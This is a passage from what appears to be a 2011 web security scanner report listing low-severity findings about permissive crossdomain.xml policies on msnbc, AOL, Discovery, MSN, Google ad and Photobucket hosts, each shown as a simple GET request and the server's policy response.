   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*.aolcdn.com" />
   <allow-access-from domain="*.test.aol.com" />
<
...[SNIP]...

6.61. http://msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.62. http://msnbcmedia.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbcmedia.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.redacted

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:31 GMT
Last-Modified: Thu, 27 Jan 2011 21:27:54 GMT
Content-Type: text/xml
ETag: "0e9d6e69becb1:484"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Content-Length: 1021
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.redacted" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.63. http://mtp.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mtp.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.64. http://music.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://music.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:53 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1147
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.facebook.com" />
...[SNIP]...

6.65. http://nbcsports.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:25b"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 3744
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:17:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.66. http://netscape.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://netscape.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.67. http://news.discovery.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: news.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT
ETag: "238b88-1763-4974f58fc8f80"
Accept-Ranges: bytes
Content-Length: 5987
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:17:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stage.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.uat.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.test.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dpr.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dev.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.oascentral.discovery.com" />
...[SNIP]...
<allow-access-from domain="dctladreg01.itg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.discoverymedia.com" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.*" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
...[SNIP]...
<allow-access-from domain="*.pets911.com" />
<allow-access-from domain="pets911.buffalo.com" />
...[SNIP]...
<allow-access-from domain="discovery.blogs.com" />
...[SNIP]...
<allow-access-from domain="*.brightcove.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.brightcove.*" />
...[SNIP]...
<allow-access-from domain="*.channelfinder.net" />
...[SNIP]...
<allow-access-from domain="*.foodfit.com" />
<allow-access-from domain="*.healthgrades.com" />
<allow-access-from domain="*.centerwatch.com" />
<allow-access-from domain="*.sittercity.com" />
<allow-access-from domain="*.chumby.com" />
...[SNIP]...
<allow-access-from domain="*.howstuffworks.com" />
...[SNIP]...
<allow-access-from domain="*.petfinder.com" />
...[SNIP]...
<allow-access-from domain="*.treehugger.com" />
...[SNIP]...
<allow-access-from domain="*.crewintegrated.com" />
...[SNIP]...
<allow-access-from domain="video.search.yahoo.com" />
...[SNIP]...
<allow-access-from domain="*.tv.com" />
...[SNIP]...
<allow-access-from domain="test.bayrock.net" />
...[SNIP]...
<allow-access-from domain="test.philadelphiaspeed.net" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.sympleton.com" />
...[SNIP]...
<allow-access-from domain="*.att.com" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

6.68. http://nightly.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nightly.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:17 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.69. http://ninemsn.video.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ninemsn.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:1892"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:21 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.70. http://openchannel.msnbc.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: openchannel.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:17:31 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.71. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 29 Jan 2011 18:12:35 GMT
Expires: Sun, 30 Jan 2011 18:12:35 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25915
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.72. http://photobucket.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://photobucket.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: photobucket.com

Response

HTTP/1.1 200 OK
